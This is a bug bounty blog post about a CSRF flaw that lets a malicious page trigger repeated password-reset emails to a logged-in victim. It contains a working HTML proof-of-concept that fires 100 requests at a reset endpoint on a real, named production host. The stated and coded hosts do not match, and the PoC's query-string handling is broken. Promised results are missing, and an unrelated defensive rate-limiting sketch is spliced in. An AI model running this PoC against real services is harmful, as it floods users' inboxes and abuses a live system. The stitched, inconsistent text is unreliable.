Email Flooding Without Knowing Victim Email Via CSRF
🔱‼️#ॐ_Har Har Mahadev_ #ॐ ‼️🔱
I’m Shuvo Kumar Saha, a security researcher and bug bounty hunter from Bangladesh.
In this blog, I will share an interesting bug I discovered last month on a website. The bug revolves around how I can flood a victim's email without knowing their email address, via CSRF.
Let’s Start
This bug arises when a logged-in user visits a page with an injected CSRF payload. There is no need to know the victim account's email address; the bug triggers whenever the user is logged in and the account is open in the victim's browser. The main problem is the target website's mechanism: if the user is logged in and the forgot-password URL is loaded with a GET request in the victim's browser, the email address is fetched from the victim's logged-in account and sent to the server.
URL like: https://con.target.tech/realms/prod-realm/login-actions/reset-credentials?client_id=target-console&tab_id=ramdom-id
This URL has 2 params, and neither of them is validated on the server side. So my hacker mind hit me: let's do something. Then I used customized CSRF code that sends the request 100 times as soon as the victim visits the CSRF-injected site.
Here is the code:
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>CSRF PoC</title>
  <script>
    function sendCSRFRequests() {
      const targetURL = "https://console.neon.tech/realms/prod-realm/login-actions/reset-credentials?client_id=neon-console&tab_id=jgnRsc-wPWM";
      for (let i = 0; i < 100; i++) {
        const img = new Image();
        img.src = `${targetURL}?nocache=${Math.random()}`; // Unique URL to bypass deduplication
      }
    }
  </script>
</head>
<body onload="sendCSRFRequests()">
  <h1>CSRF PoC</h1>
  <p>Requests are sent automatically when the page loads.</p>
</body>
</html>
After doing everything, the result:
I reported it to a private program; they closed it as informative.
Then I clarified with some words.
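On the server side, the request pattern above is stopped by three checks: no email on GET, no cross-site requests, and a per-account cap on reset emails. The sketch below is an added example, not code from this post or from the affected site; the function names, the placeholder origin, the limits and the request shape are all assumptions.

```javascript
// Added defensive example; names, limits and request shape are assumptions.
const ALLOWED_ORIGIN = "https://app.example.test"; // placeholder origin
const MAX_EMAILS = 3;               // reset emails per account per window
const WINDOW_MS = 15 * 60 * 1000;   // 15 minutes

const sentLog = new Map(); // accountId -> timestamps of reset emails sent

// Decide whether a reset-credentials request may trigger an email.
function decideReset(req, now = Date.now()) {
  // 1. Sending mail is a state change: never do it on GET.
  if (req.method !== "POST") return { send: false, reason: "method" };

  // 2. Reject cross-site requests via Fetch Metadata, falling back to Origin
  //    for browsers that do not send Sec-Fetch-Site.
  const site = req.headers["sec-fetch-site"];
  if (site !== undefined) {
    if (site !== "same-origin") return { send: false, reason: "cross-site" };
  } else if (req.headers["origin"] !== ALLOWED_ORIGIN) {
    return { send: false, reason: "origin" };
  }

  // 3. Cap emails per account so even same-origin abuse cannot flood.
  const recent = (sentLog.get(req.accountId) || []).filter(t => now - t < WINDOW_MS);
  if (recent.length >= MAX_EMAILS) {
    sentLog.set(req.accountId, recent);
    return { send: false, reason: "rate-limit" };
  }
  recent.push(now);
  sentLog.set(req.accountId, recent);
  return { send: true, reason: "ok" };
}

// Constructed sample: 100 requests shaped like the image loads in the PoC.
function replayPoc(count = 100) {
  let sent = 0;
  for (let i = 0; i < count; i++) {
    const req = { method: "GET", accountId: "victim",
      headers: { "sec-fetch-site": "cross-site", "sec-fetch-dest": "image" } };
    if (decideReset(req).send) sent++;
  }
  return sent;
}

console.log("emails sent for PoC replay:", replayPoc());
```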
Cheers ✌️ and thanks for reading to the end of this article.